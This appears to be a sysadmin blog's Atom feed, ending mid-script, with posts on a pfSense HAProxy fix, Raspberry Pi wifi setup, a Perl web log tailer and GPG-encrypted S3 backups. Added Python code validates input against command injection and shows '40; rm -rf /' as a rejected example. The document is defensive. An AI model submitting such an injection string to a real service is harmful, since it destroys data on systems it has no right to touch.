<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <title>ctrl-alt-del.cc</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/" />
    <link rel="self" type="application/atom+xml" href="http://www.ctrl-alt-del.cc/atom.xml" />
    <id>tag:www.ctrl-alt-del.cc,2008-03-18://1</id>
    <updated>2012-05-19T15:05:30Z</updated>
    <subtitle>Soft reset site for IT admins and other staff</subtitle>
    <generator uri="http://www.sixapart.com/movabletype/">Movable Type 4.38</generator>

<entry>
    <title>Fixing HAProxy configuration in pfSense</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2012/05/fixing-haproxy-configuration-in-pfsense.html" />
    <id>tag:www.ctrl-alt-del.cc,2012://1.45</id>

    <published>2012-05-19T15:03:54Z</published>
    <updated>2012-05-19T15:05:30Z</updated>

    <summary>Some time ago I was experimenting with pfSense and HAProxy to deploy both as firewall and load balancer for one of the websites I was working on at the time. The key incentive was that pfSense is great BSD based...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="solutions" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="haproxy" label="HAproxy" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="pfsense" label="pfSense" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Some time ago I was experimenting with <a href="http://pfsense.org/">pfSense</a> and <a href="http://haproxy.1wt.eu/">HAProxy</a> to deploy both as firewall and load balancer for one of the websites I was working on at the time. The key incentive was that pfSense is a great BSD-based firewall distribution with amazing features offered out of the box, and if that was not enough, you can install additional packages to add the features you need.<br />
One of those packages is HAProxy (proxy/load balancer) and both work together very nicely but...<br />
<br />
<b>Problem</b><br />
I have installed pfSense with HAProxy several times, more than several in fact... and every time I did it, the configuration file generated by the HAProxy web configurator (integrated with the pfSense interface) was broken. The first row in the table of defined backends was empty - the configuration file itself had just the variables but no values. The second entry was just fine... Obviously HAProxy refused to start.<br />
<br />
<b>Quick fix</b><br />
Just so I remember next time what I did. Get a shell on the pfSense console or install the file manager package and edit <i>/usr/local/pkg/haproxy.inc</i> to add the line highlighted below:<br />
<br />
<img alt="haproxy-edit.png" src="http://www.ctrl-alt-del.cc/2012/05/19/haproxy-edit.png" class="mt-image-center" style="text-align: center; display: block; margin: 0 auto 20px;" height="389" width="600" />
Not rocket science: just shift() the first (empty) backend definition and let the script do the rest.<br />
<br />
<b>Note</b><br />
Manually fixing the config file is pointless because a new config is generated every time HAProxy (re)starts, and the code above is what generates it.<br />
 ]]>
        
    </content>
</entry>

<entry>
    <title>Raspberry Pi meets Edimax EW-7811Un wireless adapter</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2012/05/raspberry-pi-meets-edimax-ew-7811un-wireless-ada.html" />
    <id>tag:www.ctrl-alt-del.cc,2012://1.44</id>

    <published>2012-05-08T21:49:56Z</published>
    <updated>2012-05-09T08:35:27Z</updated>

    <summary>This post contains my notes - what I did to make it work properly, so next time I build the system, I have a step by step guide. In case you lived under the rock for the last months and...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="hardware" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="networking" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="systems" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="ew7811un" label="EW-7811Un" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="raspberrypi" label="Raspberry Pi" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="rtl8188cus" label="RTL8188CUS" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="rtl8192cu" label="RTL8192CU" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[This post contains my notes - what I did to make it work properly, so next time I build the system I have a step-by-step guide. In case you lived under a rock for the last few months and don't know what Raspberry Pi is, you should visit <a href="http://www.raspberrypi.org/">www.raspberrypi.org</a> now.<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="Raspberry Pi" src="http://www.ctrl-alt-del.cc/2012/05/08/RaspberryPi.jpg" class="mt-image-center" style="text-align: center; display: block; margin: 0 auto 20px;" height="456" width="600" /></span>I bought the <a href="http://www.edimax.co.uk/en/produce_detail.php?pd_id=328&amp;pl1_id=1&amp;pl2_id=44">Edimax EW-7811Un</a> adapter for my Pi - small form factor, b/g/n type, so why not... especially when the vendor says it provides Linux drivers (wohoo!). Sadly, as it turns out, compiling drivers on x86 or x64 and on ARM can be a totally different experience - especially with the Raspberry Pi being in its software infancy. In all seriousness - the Pi is for those that like to solve problems (at least at the current stage), but the community works hard to catch up very quickly - great stuff!<br /><br />]]>
        <![CDATA[<b>The wireless adapter</b><br /><br />Under the hood, the EW-7811Un runs Realtek's rtl8192cu chipset. A kernel module for this chipset is actually included in the Debian 6 image (19-04-2012) distributed via the Raspberry Pi website, but it will not work with the card. This applies to the device with USB ID 7392:7811 - there may be other hardware revisions that will work.<br />Actually, after the whole procedure described here, running lsusb shows a totally different chipset<br /><br /><blockquote>EW-7811Un 802.11n Wireless Adapter [Realtek RTL8188CUS]<br /></blockquote>so I'm not sure which one it really is... and to be fair, I don't care - it works :-)<br /><br /><b>Debian6-19-04-2012 image</b><br /><br />The Debian image is really nice to start with but it has some issues. Maybe I'm a purist, but working for some time with ARM devices I learned to value the resources they offer. I was a bit surprised how many unneeded things were turned on by default and that SSH was actually disabled. We will get those things fixed a bit further down...<br /><br /><b>Putting the bits together</b><br /><br />I had to change the procedure a bit, because the whole system wasn't very stable. I was getting a lot of kernel panics and segfaults that were causing the Pi to freeze (read: hang) all the time. My first suspicion was the power supply (I use an iPhone PSU - it's rated 5V/1A) but it seems it was a firmware/kernel issue, so we start with fixing that first. 
Some of the steps below (especially firmware part) were found on the <a href="http://www.raspberrypi.org/forum/">Raspberry Pi forums</a> in thread about XBMC so kudos to their authors - you guys rock!<br /><br />Firmware:<br /><ul><li>Start with debian6-19-04-2012 image<br /></li><li>Download the <a href="https://github.com/raspberrypi/firmware">latest firmware</a> from GitHub - I used revision a8f8d24</li><li>Copy all files from <i>firmware/boot</i> to <i>/boot</i><br /></li><li>Replace <i>/opt/vc</i> with <i>firmware/opt/vc</i></li><li>Replace <i>/lib/modules/3.1.9+</i> with <i>firmware/modules/3.1.9+</i><br /></li><li>Download the <a href="https://github.com/raspberrypi/tools">latest tools</a> from GitHub - I used revision 3aba47b</li><li>Copy <i>arm-bcm2708/linux-x86/arm-bcm2708-linux-gnueabi/sys-root/lib/libstdc++.so.6.0.14</i> from https://github.com/raspberrypi/tools to <i>/usr/lib</i> and run: <i>sudo ldconfig</i></li></ul>Now the wireless part:<br /><ul><li>Download the compiled driver module from <a href="http://www.electrictea.co.uk/rpi/8192cu.tar.gz">here</a>, unpack and move to <i>/lib/modules/3.1.9+/kernel/net/wireless/</i></li><li>Run: <i>sudo depmod -a<br /></i></li><li>We need to block the kernel module that comes with Debian image - edit <i>/etc/modprobe.d/blacklist.conf</i> and add the following line: <i>blacklist rtl8192cu</i></li><li>We want the new module to always load on boot, regardless of hardware being present or not - edit <i>/etc/modules</i> and add the following line: <i>8192cu</i></li></ul>Automatically connect to WPA2 network at boot - no GUI needed:<br /><ul><li>Configure wpa_supplicant - edit <i>/etc/wpa_supplicant.conf</i>:</li></ul><blockquote><blockquote>ctrl_interface=/var/run/wpa_supplicant<br />network={<br />&nbsp;&nbsp;&nbsp; ssid="MyWPA2wifi"<br />&nbsp;&nbsp;&nbsp; scan_ssid=1<br />&nbsp;&nbsp;&nbsp; proto=RSN<br />&nbsp;&nbsp;&nbsp; key_mgmt=WPA-PSK<br />&nbsp;&nbsp;&nbsp; pairwise=CCMP<br />&nbsp;&nbsp;&nbsp; 
group=CCMP<br />&nbsp;&nbsp;&nbsp; # to get encoded PSK run: wpa_passphrase &lt;ESSID&gt;<br />&nbsp;&nbsp;&nbsp; psk=&lt;psk returned by wpa_passphrase&gt;<br />}<br /></blockquote></blockquote><ul><li>Make the interface come up automatically - edit <i>/etc/network/interfaces</i>:</li></ul><blockquote><blockquote>auto wlan0<br />iface wlan0 inet dhcp<br />pre-up wpa_supplicant -Dwext -i wlan0 -c /etc/wpa_supplicant.conf -B<br /></blockquote></blockquote><br /><b>Various fixes for Debian6-19-04-2012 image</b><br /><br /><ul><li>Enable SSH at boot if you need it (I do, very much):</li></ul><blockquote><blockquote>sudo update-rc.d ssh defaults<br /></blockquote>or rename <i>boot_enable_ssh.rc</i> to <i>boot.rc</i> and reboot - this file is on the FAT partition so you can do it even under Windows<br /></blockquote><ul><li>Broken <i>/etc/apt/sources.list</i> - apt-get complains about duplicate sources, easy to fix - the Debian sources should be on one line, not two:</li></ul><blockquote><blockquote>deb http://ftp.uk.debian.org/debian/ squeeze main contrib non-free<br /></blockquote></blockquote><ul><li>Disable services you possibly don't need (I know I don't) but that come enabled by default:</li></ul><blockquote><blockquote>sudo update-rc.d -f portmap remove<br />sudo update-rc.d -f nfs-common remove<br />sudo update-rc.d -f xinetd remove<br /></blockquote></blockquote><ul><li>Fix NTP drift file location permissions - the Raspberry Pi doesn't keep time (no battery) so it syncs with NTP after every boot:</li></ul><blockquote><blockquote>sudo chown root:root /var/lib/ntp<br /></blockquote></blockquote><br /><b>Summary</b><br /><br />The Raspberry Pi boots up, brings up the wireless interface and connects to the network. After the firmware update I have not seen a single kernel panic or segfault yet, which is a huge change from how my Pi behaved before. Basically it was dying on any operation that required some more wifi network use (wget was enough), more CPU and/or more RAM... 
and having 192MB of usable RAM (because RAM is shared with the GPU) made that a really common situation.<br /><br />Enjoy!<br /><br /><font style="font-size: 0.8em;">Standard disclaimer - it works for me!</font><br />]]>
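        <![CDATA[The wpa_supplicant.conf above stores the PSK that wpa_passphrase prints rather than the plaintext passphrase. The Python below is an added example, not part of the original post, showing what that derivation is (IEEE 802.11i: PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256-bit output) and emitting the same network block; the SSID and passphrase values are constructed, and the last function only confirms that the psk= line holds a derived key and not a quoted passphrase.

```python
"""Added example: derive the WPA2 PSK the way wpa_passphrase does and emit a
wpa_supplicant network block. SSID/passphrase values are constructed."""
import hashlib
import re


def wpa2_psk(ssid: str, passphrase: str) -> str:
    """IEEE 802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrase must be 8 to 63 characters")
    if not 1 <= len(ssid.encode()) <= 32:
        raise ValueError("SSID must be 1 to 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()


def network_block(ssid: str, passphrase: str) -> str:
    """The network={...} stanza from the post, with the derived PSK filled in."""
    lines = [
        "network={",
        f'    ssid="{ssid}"',
        "    scan_ssid=1",
        "    proto=RSN",
        "    key_mgmt=WPA-PSK",
        "    pairwise=CCMP",
        "    group=CCMP",
        f"    psk={wpa2_psk(ssid, passphrase)}",
        "}",
    ]
    return "\n".join(lines)


def psk_is_derived(block: str) -> bool:
    """True if the psk= line carries a 64-hex derived key rather than a quoted passphrase."""
    match = re.search(r"^\s*psk=(\S+)\s*$", block, re.MULTILINE)
    return match is not None and re.fullmatch(r"[0-9a-f]{64}", match.group(1)) is not None


if __name__ == "__main__":
    # Constructed example values; replace with your own network.
    print(network_block("MyWPA2wifi", "correct horse battery staple"))
```

The derived PSK is still enough to join the network, so /etc/wpa_supplicant.conf should stay readable by root only (chmod 600); storing the derived form just keeps the passphrase itself out of the file.
]]>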
    </content>
</entry>

<entry>
    <title>Logfile tail the web way</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2012/03/logfile-tail-the-web-way.html" />
    <id>tag:www.ctrl-alt-del.cc,2012://1.43</id>

    <published>2012-03-04T01:47:50Z</published>
    <updated>2012-03-10T13:16:00Z</updated>

    <summary>Recently I needed something like web based equivalent of tail -f and tail -n commands, so I could display running tail or last N lines from specific log file. To avoid reinventing the wheel I started looking at previous works...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="code" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="logs" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="software" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="solutions" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="logs" label="logs" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="perl" label="perl" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="tail" label="tail" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="web" label="web" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Recently I needed something like a web-based equivalent of the <i>tail -f</i> and <i>tail -n</i> commands, so I could display a running tail or the last N lines from a specific log file. To avoid reinventing the wheel I started looking at previous works on-line and found some interesting bits here and there - one of the most useful being <a href="http://commavee.com/2007/04/13/ajax-logfile-tailer-viewer/">AJAX Logfile Tailer &amp; Viewer</a>, so I based my work on this one.<br /><br />The catch is that, while it does exactly what I needed, this solution requires a web server with PHP... and installing a web server (not to mention PHP) is not really what I want on my logserver.<br /><b><font style="font-size: 1.25em;"><br />Mojolicious to the rescue!</font></b><br /><br /><a href="http://www.mojolicio.us/">Mojolicious</a> is a very powerful Perl web framework that comes without bloat (almost unheard of these days!) - all you need is the standard Perl interpreter and the core Perl modules as they come preinstalled with your Linux distro, and you can install Mojolicious - no other dependencies. On Debian systems installation is as simple as <br /><br /><blockquote>apt-get install libmojolicious-perl<br /></blockquote><br />and we're up and running. Writing a Mojolicious::Lite app is really simple and the best part is that it comes with its own built-in web server (operating in several different modes if needed). Sounds like a nice way to go - no dedicated web server on the machine, self-contained application, etc. One more thing - writing, testing and deploying the whole code to the actual machine took less than 10 minutes!<br />]]>
        <![CDATA[<br /><font style="font-size: 1.25em;"><b>Implementation details</b></font><br />
<br />
I decided to take HTML and JavaScript elements from the <a href="http://commavee.com/2007/04/13/ajax-logfile-tailer-viewer/">AJAX Logfile Tailer &amp; Viewer</a> as they seemed to do just what I need and because JavaScript is just not my cup of tea so certainly, I wouldn't write it myself.<br /><br />All of the code is written as <i>Mojolicious::Lite</i> app, with HTML and JavaScript stored as embedded templates (see DATA section of the script), so all I need to run it is Mojolicious and the script itself - nice, portable solution with low memory footprint when running. Yes, I could use Web Sockets, Comet or any similar technology (Mojolicious supports those out of the box anyway) but I didn't have time to play with it right then - I needed something that will work.<br /><br />Note to all Perl purists - I know you won't like the code because I call external (system) tail command to get log lines, but I didn't have time and honestly was too lazy to write it in pure Perl - will fix that in v2.0.<br /><br />To keep code listing short, I'll put placeholders for HTML and Javascript elements.<br /><br /><blockquote><i>#!/usr/bin/perl<br />use strict;<br />use warnings;<br />use Mojolicious::Lite;<br />use HTML::Entities;<br /><br /># logfile we want to see<br />my $logfile = '/var/log/syslog';<br /><br /># Route requests to templates in DATA section<br />get '/' =&gt; 'index';<br />get '/js/ajax.js' =&gt; 'ajax';<br />get '/js/logtail.js' =&gt; 'logtail';<br /><br /># RESTful interface - fixed tail size<br />get '/logdata' =&gt; sub {<br />&nbsp;&nbsp;&nbsp; my $self&nbsp;&nbsp;&nbsp; = shift;<br />&nbsp;&nbsp;&nbsp; open (IN, "tail -40 $logfile |");<br />&nbsp;&nbsp;&nbsp; chomp(my @log = (&lt;IN&gt;));<br />&nbsp;&nbsp;&nbsp; close (IN);</i><i><br />
&nbsp;&nbsp;&nbsp; map { $_ = encode_entities($_) } @log;</i><br /><i>&nbsp;&nbsp;&nbsp; $self-&gt;render(text =&gt; join("\n", reverse @log));<br />};<br /><br /># variable tail size<br />get '/tail-n/:N' =&gt; sub {<br />&nbsp;&nbsp;&nbsp; my $self = shift;<br />&nbsp;&nbsp;&nbsp; my $N = $self-&gt;param('N');<br />&nbsp;&nbsp;&nbsp; if ($N =~ /\D/) {<br />&nbsp; &nbsp; &nbsp; &nbsp; # command injection attempt?</i> <i><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $self-&gt;render(text =&gt; "Y U NO GIVE UP, NICE TRY!");<br />&nbsp;&nbsp;&nbsp; } else {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; open (IN, "tail -$N $logfile |");<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; chomp(my @log = (&lt;IN&gt;));<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; close (IN);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; map { $_ = encode_entities($_) } @log;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $self-&gt;render(text =&gt; join("&lt;br/&gt;", reverse @log));<br />&nbsp;&nbsp;&nbsp; }<br />};<br /><br /># cookie encryption passphrase&nbsp; - no use here but if missing it produces warning :-)<br />app-&gt;secret('youcansafelyignorethisone');<br />app-&gt;start;<br /><br />__DATA__<br />@@ index.html.ep<br />&lt;!-- here goes all the index.html contents --&gt;<br /><br />@@ ajax.js.ep<br />&lt;!-- yes, you guessed it --&gt;<br /><br />@@ logtail.js.ep<br /></i>/* an ajax log file tailer / viewer<br />copyright 2007 john minnihan.<br />&nbsp;<br />http://freepository.com<br />&nbsp;<br />Released under these terms<br />1. This script, associated functions and HTML code ("the code") may be used by you ("the recipient") for any purpose.<br />2. This code may be modified in any way deemed useful by the recipient.<br />3. This code may be used in derivative works of any kind, anywhere, by the recipient.<br />4. Your use of the code indicates your acceptance of these terms.<br />5. 
This notice must be kept intact with any use of the code to provide attribution.<br />*/<br /><i>&lt;!-- original disclaimer, the rest is as above --&gt;</i><br /></blockquote><br />That's it! Keep in mind that you have to customize a bit <i>logtail.js.ep</i> part - function <i>getLog</i> has <i>url</i> variable you need to point to <i>/logdata</i> provided by our script. You can also specify how often the AJAX call will be made to fetch log data - this is done in <i>startTail</i> function. I use 2000ms value and it's well enough, if not too often anyway - tune it so you won't get more than 40 lines in the log during this time... or tune for the maximum smoke - your call.<br /><br /><b><font style="font-size: 1.25em;">How it works?</font></b><br /><br />Built-in web server will respond to all paths defined with <i>get '&lt;path&gt;'</i> statement. Those that are routed to templates, will respond with templates (which can have dynamic content as well but that's out of scope here). Those with defined subroutines will get the code executed - no magic here.<br /><br />Index page pulls in two JavaScript files (all template based), <i>logtail.js</i> requests data from first subroutine responsible for <i>'/logdata'</i> and this one is refreshed as per timer in <i>startTail</i> function. <br /><br />Second subroutine is used to display static log chunk that won't refresh itself automatically - in case you are debugging something, the last thing you want are disappearing logs. This one is manually called by the user as <i>http://scrpt_url/tail-n/&lt;lines to display&gt;</i>. Just in case someone had the idea to run script as root (command injection could be deadly!) 
the script will refuse to run tail and just reply with a message if the provided number of lines contains non-digits.<br /><br /><b><font style="font-size: 1.25em;">Running the app</font></b><br /><br />You can run it in many ways, but for small deployments (like mine) this is entirely enough:<br /><br /><blockquote>./webtail-ajax.pl daemon<br /></blockquote><br />This will start a listener on port 3000 (the default, can be changed with a command line parameter).<br /><br /><b><font style="font-size: 1.25em;">Security warning</font></b><br /><br />Logs can contain data that is not safe to be displayed via a web interface as-is - think of XSS for example. At best, you will get a popup, at worst... well, much worse. This is why I've added <i>encode_entities()</i> from <i>HTML::Entities</i> to the script - the current version escapes at least the basic elements but you can decide which ones you want to encode - see the module documentation for details.<br /><br /><b><font style="font-size: 1.25em;">Credits</font></b><br /><br />A big thank you goes to Sebastian Riedel (<a href="https://twitter.com/kraih">@kraih</a>) for his work on Mojolicious which simply rocks, and John Minnihan who wrote the HTML and JavaScript I used... as well as many others that gave me some ideas but whose proposed approach was sadly not acceptable in my usage scenario.<br />]]>
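        <![CDATA[The viewer above shells out to tail with a user-supplied line count and relies on a digits-only check to keep shell metacharacters out, and the author notes a pure-Perl tail is on the to-do list. The Python below is an added example, not the post's code, of both halves done without a shell: a tail that seeks backwards from the end of the file, a strict line-count parser with an upper bound, and HTML escaping of every line before it reaches the browser (the equivalent of the encode_entities() call). The log lines it writes to a temporary file are constructed, and MAX_LINES is an assumed cap.

```python
"""Added example: tail -N and HTML escaping in pure Python, no shell involved.
The sample log below is constructed for the demo."""
import html
import os
import re
import tempfile

MAX_LINES = 1000  # assumed upper bound so one request cannot ask for the whole file


def parse_line_count(raw, default: int = 40) -> int:
    """Accept only a plain decimal count between 1 and MAX_LINES.
    Anything else (empty, negative, '40; rm -rf /') is rejected outright."""
    if raw is None:
        return default
    if not re.fullmatch(r"[0-9]{1,6}", raw):
        raise ValueError("line count must contain digits only")
    n = int(raw)
    if not 1 <= n <= MAX_LINES:
        raise ValueError(f"line count must be between 1 and {MAX_LINES}")
    return n


def tail_file(path: str, n: int, block_size: int = 4096) -> list:
    """Return the last n lines of path, reading backwards in blocks so a
    multi-gigabyte log is never loaded into memory."""
    chunks = []
    newlines = 0
    with open(path, "rb") as fh:
        fh.seek(0, os.SEEK_END)
        pos = fh.tell()
        # Keep reading until more than n newlines have been seen (or the start is hit),
        # which guarantees the last n lines are complete.
        while pos > 0 and newlines <= n:
            step = min(block_size, pos)
            pos -= step
            fh.seek(pos)
            chunk = fh.read(step)
            chunks.append(chunk)
            newlines += chunk.count(b"\n")
    data = b"".join(reversed(chunks))
    return data.decode("utf-8", errors="replace").splitlines()[-n:]


def render_log(lines, newest_first: bool = True) -> str:
    """Escape each line before joining with <br/>, so a log entry containing
    markup is shown as text instead of being interpreted by the browser."""
    ordered = list(reversed(lines)) if newest_first else list(lines)
    return "<br/>".join(html.escape(line, quote=True) for line in ordered)


# Constructed sample log: 50 ordinary lines plus one carrying markup.
SAMPLE_LOG = ("\n".join(
    [f"Mar  4 01:47:{i:02d} host sshd[123]: Accepted publickey for admin" for i in range(50)]
    + ["Mar  4 01:48:00 host app: user-agent <script>alert(1)</script>"]
) + "\n").encode()


def demo(n: int = 3, block_size: int = 4096) -> str:
    """Write the sample log to a temporary file and render its last n lines."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(SAMPLE_LOG)
        path = tmp.name
    try:
        return render_log(tail_file(path, n, block_size))
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo(parse_line_count("5")))
```

With no shell in the path, the digits-only check is no longer what stands between a request and command execution; it now only bounds how much of the file a single request can pull, which is the remaining abuse case for a tail endpoint.
]]>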
    </content>
</entry>

<entry>
    <title>Secure backup of untrusted remote hosts</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2012/02/secure-backup-of-untrusted-remote-hosts.html" />
    <id>tag:www.ctrl-alt-del.cc,2012://1.42</id>

    <published>2012-02-23T22:06:15Z</published>
    <updated>2012-03-01T22:44:18Z</updated>

    <summary>I didn&apos;t blog for a long time, so it will be a long post caused by some nightmares I had about not doing proper backups on some of my hosts.Servers - all those small and big machines most of the...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="cloud" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="solutions" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="systems" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="backup" label="backup" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="cloudcomputing" label="cloud computing" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="iam" label="IAM" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="pgp" label="PGP" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="s3" label="S3" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="vps" label="VPS" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[I didn't blog for a long time, so this will be a long post, caused by some nightmares I had about not doing proper backups on some of my hosts.<br /><br />Servers - all those small and big machines most geeks own, run or operate. As VPS pricing drops, we see more and more of those low-end, resource-strapped servers. Organic growth usually means you start with an empty server, some kind of definition of what it will be doing and... from there it just goes downhill. How do you back up such a VPS? Here is something I use myself.<br /><br /><font style="font-size: 1.25em;"><b>My backup requirements</b></font><br /><br /><ul><li>Automated - it has to run without supervision at roughly regular time intervals; if it's not automated it will never be done (read: no backup)</li><li>Off-site - in case I lose the whole machine for some reason (because RAID is not backup, and what fire doesn't destroy, water poured by firemen will)</li><li>No Cross-Backups - because they require a trust relationship between machines, and if you think about using cheap VPSes for cross-backups, remember that you get what you pay for!</li><li>Automatically delete old backups - to save space, (my) time and money</li><li>Append only - a machine can only write data to its own, designated backup volume but can not delete or modify other volumes (accidents and rogue users do happen)</li><li>Confidentiality - no unauthorized access to backed-up data</li><li>Availability - the storage volume has to be highly available so I can not only write to it knowing it's there, but also access backups when I need them</li><li>Access controls - ability to define granular access rules and enforce append-only usage</li><li>Economy - it has to have a reasonable cost</li></ul> ]]>
        <![CDATA[<br /><font style="font-size: 1.25em;"><b>Proposed solution</b></font><br /><br />The server creates a tarball with the files I want to copy, using a simple shell script triggered from cron. The file created is encrypted with GnuPG using the key of my backup user, and the private key is stored off-line. The encrypted file is uploaded to an off-site storage volume.<br /><br />As I used Amazon AWS before, this was my first choice. The company is big enough to do a quality job, offers all the building blocks, and pay-per-use is just what I need. By combining services from Amazon I can satisfy most of the requirements out of the box and easily add what is missing.<br /><br />Amazon S3 is a storage solution that allows you to put your files into 'buckets' (think file shares) with globally unique names. Each bucket has a series of properties - for example geographical location, so you can select where your data will reside (thinking of legal stuff and price differences across locations), object expiry time, which will be our auto-delete mechanism for old data, and finally ACLs. Because those ACLs are not enough for what I want to do (or rather how I want to have it done) I will be using the IAM service, which nicely integrates with S3 and many other AWS services, so let's get it set up.<br /><br /><font style="font-size: 1.25em;"><b>Setting up S3</b></font><br /><br />I create a separate S3 bucket for each host, so I can select the location and different expiry times easily. I decided to name buckets after the host's FQDN with a '-backups' suffix, so for this blog post I have a bucket called <i>aws-poc.home.lab-backups</i>. In the bucket properties we are interested in the object expiry time configuration. Simply add the rule as seen below. 
If you leave the prefix empty, it will affect all objects in the bucket - which is exactly what I want - retain backups for 180 days.<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="s3lifecycle.png" src="http://www.ctrl-alt-del.cc/2012/02/23/s3lifecycle.png" class="mt-image-center" style="text-align: center; display: block; margin: 0 auto 20px;" height="208" width="782" /></span><font style="font-size: 1.25em;"><b>IAM configuration</b></font><br /><br />Uploading to S3 via the web service requires providing a user's Access Key ID and Secret Access Key. For each server I want to back up I need a separate IAM user - this will allow me to tell them apart and revoke access to the backup bucket if needed. IAM lets us allow or deny specific actions for IAM users and groups, like 'allow uploading files only to bucket X, block all other bucket operations' - we do that below.<br /><br />After creating the user in the IAM service (yes, IAM, not S3), remember to write down the access keys - they can't be displayed later - you would have to generate new keys (see user properties).<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="iam-keys.png" src="http://www.ctrl-alt-del.cc/2012/02/23/iam-keys.png" class="mt-image-center" style="text-align: center; display: block; margin: 0 auto 20px;" height="309" width="674" /></span>Now we need to define what the user can do. In the user properties under the <i>Permissions</i> tab, we select <i>Attach User Policy</i> and choose <i>Policy Generator</i>. To have append-only access to our S3 bucket we need to grant the user the <u><i>PutObject</i></u> action (and only this one) and specify the ARN of our S3 bucket. 
This is the minimum we need to do.<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="iam-policy.png" src="http://www.ctrl-alt-del.cc/2012/02/23/iam-policy.png" class="mt-image-center" style="text-align: center; display: block; margin: 0 auto 20px;" height="501" width="672" /></span><br /><font style="font-size: 1.25em;"><b>Backup and upload scripts</b></font><br /><br />Backup scripts are really easy - just tar and compress the directories as needed so they contain what is to be backed up, pipe that through gpg and save it somewhere for a short time... Then upload to S3 and you can delete the original encrypted tarball. For example it can be done this way:<br /><br /><blockquote>#!/bin/bash<br />#<br /># this is updated version that adds file hash to the name<br /># so once file was uploaded and source data changed, <br /># potential attacker can't overwrite files already uploaded<br />#<br />WORKDIR=/tmp<br />DATE=`date +%Y%m%d`<br />HOSTNAME=`hostname --fqdn`<br />cd $WORKDIR<br />tar cf - /etc /var/backups 2&gt;/dev/null | bzip2 -9 | gpg -e -r backups &gt; tmpbackup<br />SHA256=`sha256sum tmpbackup | awk '{ print $1; }'`<br />BACKUPFILE=$DATE-$HOSTNAME-$SHA256.tar.bz2.gpg<br />mv tmpbackup $BACKUPFILE<br />s3upload.pl $HOSTNAME-backups $BACKUPFILE &amp;&amp; rm $BACKUPFILE<br /></blockquote><br />That's all - the upload is done by the s3upload.pl script:<br /><br /><blockquote>#!/usr/bin/perl<br />use strict;<br />use warnings;<br />use Net::Amazon::S3;<br /><br /># requires:<br /># apt-get install libnet-amazon-s3-perl libwww-perl libxml-simple-perl<br /><br />if ($#ARGV &lt; 1) {<br />&nbsp;&nbsp;&nbsp; print "Usage:\n\t$0 &lt;bucket name&gt; &lt;file name&gt;\n";<br />&nbsp;&nbsp;&nbsp; exit 1;<br />}<br /><br />my $s3 = Net::Amazon::S3-&gt;new({&nbsp; &nbsp;<br />&nbsp;&nbsp;&nbsp; aws_access_key_id =&gt; "INSERT KEY ID HERE",<br />&nbsp;&nbsp;&nbsp; aws_secret_access_key =&gt; "INSERT SECRET KEY HERE",<br />&nbsp; });<br /><br /># upload 
